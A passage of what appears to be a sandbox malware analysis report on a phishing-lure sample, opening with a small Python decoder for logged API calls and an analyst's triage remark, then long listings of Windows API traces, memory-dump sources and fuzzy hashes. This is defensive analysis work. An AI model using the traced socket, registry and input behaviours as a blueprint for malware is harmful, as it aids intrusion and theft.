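    for line in KEYUP_BLOCK + ["• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00F91112"]:
        call = parse_api_line(line)
        print(call.ref, decode(call))
    print(injected_modifier_keys(KEYUP_BLOCK))
```

Running it on the record above prints the four PostMessageW calls as WM_KEYUP for VK_SHIFT, VK_CONTROL, VK_MENU and VK_LWIN, and the socket call as AF_INET/SOCK_STREAM/IPPROTO_TCP; the second KeyboardState record (message 0x0100) decodes the same way with WM_KEYDOWN. The point for triage is that this helper is plumbing for sending input, so the keylogging verdict in the report should rest on the hook and credential-access signatures, not on these two functions.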
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F77769
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F7778F
• SysAllocString.OLEAUT32(00000000), ref: 00F77792
• SysAllocString.OLEAUT32(?), ref: 00F777B0
• SysFreeString.OLEAUT32(?), ref: 00F777B9
• StringFromGUID2.OLE32(?,?,00000028), ref: 00F777DE
• SysAllocString.OLEAUT32(?), ref: 00F777EC
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F77842
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F77868
• SysAllocString.OLEAUT32(00000000), ref: 00F7786B
• SysAllocString.OLEAUT32 ref: 00F7788C
• SysFreeString.OLEAUT32 ref: 00F77895
• StringFromGUID2.OLE32(?,?,00000028), ref: 00F778AF
• SysAllocString.OLEAUT32(?), ref: 00F778BD
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 00F804F2
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F8052E
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 00F805C6
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F80601
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
APIs
  • Part of subcall function 00F1600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F1604C
  • Part of subcall function 00F1600E: GetStockObject.GDI32(00000011), ref: 00F16060
  • Part of subcall function 00F1600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F1606A
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00FA4112
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00FA411F
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00FA412A
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00FA4139
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00FA4145
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• API String ID: 1025951953-3636473452
APIs
  • Part of subcall function 00F4D7A3: _free.LIBCMT ref: 00F4D7CC
• _free.LIBCMT ref: 00F4D82D
  • Part of subcall function 00F429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F4D7D1,00000000,00000000,00000000,00000000,?,00F4D7F8,00000000,00000007,00000000,?,00F4DBF5,00000000), ref: 00F429DE
  • Part of subcall function 00F429C8: GetLastError.KERNEL32(00000000,?,00F4D7D1,00000000,00000000,00000000,00000000,?,00F4D7F8,00000000,00000007,00000000,?,00F4DBF5,00000000,00000000), ref: 00F429F0
• _free.LIBCMT ref: 00F4D838
• _free.LIBCMT ref: 00F4D843
• _free.LIBCMT ref: 00F4D897
• _free.LIBCMT ref: 00F4D8A2
• _free.LIBCMT ref: 00F4D8AD
• _free.LIBCMT ref: 00F4D8B8
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00F7DA74
• LoadStringW.USER32(00000000), ref: 00F7DA7B
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00F7DA91
• LoadStringW.USER32(00000000), ref: 00F7DA98
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F7DADC
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 00F7DAB9
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: HandleLoadModuleString$Message
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 4072794657-3128320259
APIs
• InterlockedExchange.KERNEL32(0122E060,0122E060), ref: 00F8097B
• EnterCriticalSection.KERNEL32(0122E040,00000000), ref: 00F8098D
• TerminateThread.KERNEL32(00000000,000001F6), ref: 00F8099B
• WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00F809A9
• CloseHandle.KERNEL32(00000000), ref: 00F809B8
• InterlockedExchange.KERNEL32(0122E060,000001F6), ref: 00F809C8
• LeaveCriticalSection.KERNEL32(0122E040), ref: 00F809CF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3495660284-0
                                                                                                                    • Opcode ID: 227ac0994cfa4a1c7c8ac02b06f85888e619415d6c1b7f0fa541a1152cce9c0c
                                                                                                                    • Instruction ID: 7b0815a28f4c13e611be39d9c96f15d9414254b8f85e2663fdd0b1633ad73702
                                                                                                                    • Opcode Fuzzy Hash: 227ac0994cfa4a1c7c8ac02b06f85888e619415d6c1b7f0fa541a1152cce9c0c
                                                                                                                    • Instruction Fuzzy Hash: 29F03C72542A06BBD7415FA4EE8CBD6BB79FF02712F802025F202908A0CB749465EFD0
                                                                                                                    APIs
                                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00F91DC0
                                                                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00F91DE1
                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00F91DF2
                                                                                                                    • htons.WSOCK32(?,?,?,?,?), ref: 00F91EDB
                                                                                                                    • inet_ntoa.WSOCK32(?), ref: 00F91E8C
                                                                                                                      • Part of subcall function 00F739E8: _strlen.LIBCMT ref: 00F739F2
                                                                                                                      • Part of subcall function 00F93224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00F8EC0C), ref: 00F93240
                                                                                                                    • _strlen.LIBCMT ref: 00F91F35
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3203458085-0
                                                                                                                    • Opcode ID: dcac46ed9ac8cac91769fad4aece017b8208e8b4da392df426a0a75617ed72d4
                                                                                                                    • Instruction ID: edd360433d6e3698726dd99f5049019d4c7aaa5a2608ee6e3f196843ff7ee40f
                                                                                                                    • Opcode Fuzzy Hash: dcac46ed9ac8cac91769fad4aece017b8208e8b4da392df426a0a75617ed72d4
                                                                                                                    • Instruction Fuzzy Hash: A0B11031604301AFEB24DF24C885E6A7BE5BF84328F54895CF4564B2E2CB35ED82DB91
                                                                                                                    APIs
                                                                                                                    • GetClientRect.USER32(?,?), ref: 00F15D30
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00F15D71
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00F15D99
                                                                                                                    • GetClientRect.USER32(?,?), ref: 00F15ED7
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00F15EF8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Rect$Client$Window$Screen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1296646539-0
                                                                                                                    • Opcode ID: c65e15aa072117ff13968e2d51aeeb3abca7413a8e29ced4e26df164e0654860
                                                                                                                    • Instruction ID: b545969d0123c489447b283d4d4fb09923b24e738cb1dd194c33f6300607c448
                                                                                                                    • Opcode Fuzzy Hash: c65e15aa072117ff13968e2d51aeeb3abca7413a8e29ced4e26df164e0654860
                                                                                                                    • Instruction Fuzzy Hash: 21B18A75A0074ADBDB10CFA8C4807EEB7F1FF48311F14841AE8A9D7250DB30AA91EB50
                                                                                                                    APIs
                                                                                                                    • __allrem.LIBCMT ref: 00F400BA
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F400D6
                                                                                                                    • __allrem.LIBCMT ref: 00F400ED
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F4010B
                                                                                                                    • __allrem.LIBCMT ref: 00F40122
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F40140
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1992179935-0
                                                                                                                    • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                                                    • Instruction ID: 7e2bd05ecb64913b55a35ad82b24cf386577fb6227f30b852f0efdba654bc3bc
                                                                                                                    • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                                                    • Instruction Fuzzy Hash: 9D81E872E007069BE720AE79CC41B6B77E9AF91334F24463AFE51D7281EB74D904AB50
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00F382D9,00F382D9,?,?,?,00F4644F,00000001,00000001,8BE85006), ref: 00F46258
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00F4644F,00000001,00000001,8BE85006,?,?,?), ref: 00F462DE
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00F463D8
                                                                                                                    • __freea.LIBCMT ref: 00F463E5
                                                                                                                      • Part of subcall function 00F43820: RtlAllocateHeap.NTDLL(00000000,?,00FE1444,?,00F2FDF5,?,?,00F1A976,00000010,00FE1440,00F113FC,?,00F113C6,?,00F11129), ref: 00F43852
                                                                                                                    • __freea.LIBCMT ref: 00F463EE
                                                                                                                    • __freea.LIBCMT ref: 00F46413
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1414292761-0
                                                                                                                    • Opcode ID: f261f0dee18d8f6fb2ee07e254037117e7dafa467a943a2452ecfa3d9f033635
                                                                                                                    • Instruction ID: 62e4c7fd58796b37f728f7d9eb3edff43e03ac7fcb61a0101cdb1f341b888e1e
                                                                                                                    • Opcode Fuzzy Hash: f261f0dee18d8f6fb2ee07e254037117e7dafa467a943a2452ecfa3d9f033635
                                                                                                                    • Instruction Fuzzy Hash: E151F372A00256ABDF258F64CC81FBF7FA9EB46720F144269FC05D6280DB38DC40E6A1
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
                                                                                                                      • Part of subcall function 00F9C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F9B6AE,?,?), ref: 00F9C9B5
                                                                                                                      • Part of subcall function 00F9C998: _wcslen.LIBCMT ref: 00F9C9F1
                                                                                                                      • Part of subcall function 00F9C998: _wcslen.LIBCMT ref: 00F9CA68
                                                                                                                      • Part of subcall function 00F9C998: _wcslen.LIBCMT ref: 00F9CA9E
                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F9BCCA
                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F9BD25
                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00F9BD6A
                                                                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F9BD99
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F9BDF3
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00F9BDFF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1120388591-0
                                                                                                                    • Opcode ID: 6d07a31a7724cd658890f8c43a9be5e3a7596e64c0f52f5650b589dd7caeb93c
                                                                                                                    • Instruction ID: 4b0597721bc01af564a6bd63b21a7e90d7222365bb2ae337d1107c1ea0903e13
                                                                                                                    • Opcode Fuzzy Hash: 6d07a31a7724cd658890f8c43a9be5e3a7596e64c0f52f5650b589dd7caeb93c
                                                                                                                    • Instruction Fuzzy Hash: 8781DF70208241EFDB14DF24C985E6ABBE5FF85318F14885DF4598B2A2CB31ED45EB92
                                                                                                                    APIs
                                                                                                                    • VariantInit.OLEAUT32(00000035), ref: 00F6F7B9
                                                                                                                    • SysAllocString.OLEAUT32(00000001), ref: 00F6F860
                                                                                                                    • VariantCopy.OLEAUT32(00F6FA64,00000000), ref: 00F6F889
                                                                                                                    • VariantClear.OLEAUT32(00F6FA64), ref: 00F6F8AD
                                                                                                                    • VariantCopy.OLEAUT32(00F6FA64,00000000), ref: 00F6F8B1
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00F6F8BB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3859894641-0
                                                                                                                    • Opcode ID: 3c9a85d9a84a0bf2e144f3e3744421acc20824e800c8ef7f2dd7014ebbff2d7a
                                                                                                                    • Instruction ID: a8827071533c18a76eb5b6b7ac1efa0ca2a5493433d42f6742205a681652f9c0
                                                                                                                    • Opcode Fuzzy Hash: 3c9a85d9a84a0bf2e144f3e3744421acc20824e800c8ef7f2dd7014ebbff2d7a
                                                                                                                    • Instruction Fuzzy Hash: 2551F932A10310FADF10AB76EC95B69B3A8EF45310F244467E906DF291DB748C48F796
APIs
  • Part of subcall function 00F17620: _wcslen.LIBCMT ref: 00F17625
  • Part of subcall function 00F16B57: _wcslen.LIBCMT ref: 00F16B6A
• GetOpenFileNameW.COMDLG32(00000058), ref: 00F894E5
• _wcslen.LIBCMT ref: 00F89506
• _wcslen.LIBCMT ref: 00F8952D
• GetSaveFileNameW.COMDLG32(00000058), ref: 00F89585
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: _wcslen$FileName$OpenSave
• String ID: X
• API String ID: 83654149-3081909835
• Opcode ID: b94f245b7dbb3b9e5e7ca5f4a4dee6d8d0f2711c1ca204bbddd9266da829bbc8
• Instruction ID: 338c89efd7c887a110641956dff9d7a0fd343bf3416f470c41d00cc837ddd367
• Opcode Fuzzy Hash: b94f245b7dbb3b9e5e7ca5f4a4dee6d8d0f2711c1ca204bbddd9266da829bbc8
• Instruction Fuzzy Hash: 51E1B631908340CFC714EF24C881AAEB7E5BF85324F08856DF8999B2A2DB75ED45DB91
APIs
  • Part of subcall function 00F29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F29BB2
• BeginPaint.USER32(?,?,?), ref: 00F29241
• GetWindowRect.USER32(?,?), ref: 00F292A5
• ScreenToClient.USER32(?,?), ref: 00F292C2
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00F292D3
• EndPaint.USER32(?,?,?,?,?), ref: 00F29321
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00F671EA
  • Part of subcall function 00F29339: BeginPath.GDI32(00000000), ref: 00F29357
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
• String ID:
• API String ID: 3050599898-0
• Opcode ID: f8ac977f2f78d8005f6a66379ac76cf268455b289c5db4e08a0faa3e8edc7d2e
• Instruction ID: 62df9061860c9e73b1bcf6af418b11133908726784f5e4edab262e92933681bc
• Opcode Fuzzy Hash: f8ac977f2f78d8005f6a66379ac76cf268455b289c5db4e08a0faa3e8edc7d2e
• Instruction Fuzzy Hash: F041AD71509314AFD720DF25DC84FBA7BB8FB46724F14022AF9948B2E2C7749845EB61
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 00F8080C
• ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00F80847
• EnterCriticalSection.KERNEL32(?), ref: 00F80863
• LeaveCriticalSection.KERNEL32(?), ref: 00F808DC
• ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00F808F3
• InterlockedExchange.KERNEL32(?,000001F6), ref: 00F80921
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
• String ID:
• API String ID: 3368777196-0
• Opcode ID: 31337c44cd7c91b224ee7fb14f62fc89c6b777f5b704a31086a52fa9acdb4051
• Instruction ID: 028192c24b9c0a8f42d67cffd11237b18896fab106929797e5a12f505b48c2cb
• Opcode Fuzzy Hash: 31337c44cd7c91b224ee7fb14f62fc89c6b777f5b704a31086a52fa9acdb4051
• Instruction Fuzzy Hash: 7D41AF71A00209EFDF05AF54DC85AAA77B8FF04310F1040B9ED00AA297DB34DE58EBA0
APIs
• ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00F6F3AB,00000000,?,?,00000000,?,00F6682C,00000004,00000000,00000000), ref: 00FA824C
• EnableWindow.USER32(00000000,00000000), ref: 00FA8272
• ShowWindow.USER32(FFFFFFFF,00000000), ref: 00FA82D1
• ShowWindow.USER32(00000000,00000004), ref: 00FA82E5
• EnableWindow.USER32(00000000,00000001), ref: 00FA830B
• SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00FA832F
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID:
• API String ID: 642888154-0
• Opcode ID: 3f87041d0598065e1a79c840ee179488b21213a49f9c38148a0e25fc8edf21cd
• Instruction ID: 744738290aa35f13e6cccd094690882335fb81971c78ebe49d61c0faacf05067
• Opcode Fuzzy Hash: 3f87041d0598065e1a79c840ee179488b21213a49f9c38148a0e25fc8edf21cd
• Instruction Fuzzy Hash: 4241C3B4A01648EFDF11CF15D899BE87BF0BB4B764F180168E6484F262CB71A842EB40
APIs
• IsWindowVisible.USER32(?), ref: 00F74C95
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00F74CB2
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00F74CEA
• _wcslen.LIBCMT ref: 00F74D08
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00F74D10
• _wcsstr.LIBVCRUNTIME ref: 00F74D1A
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
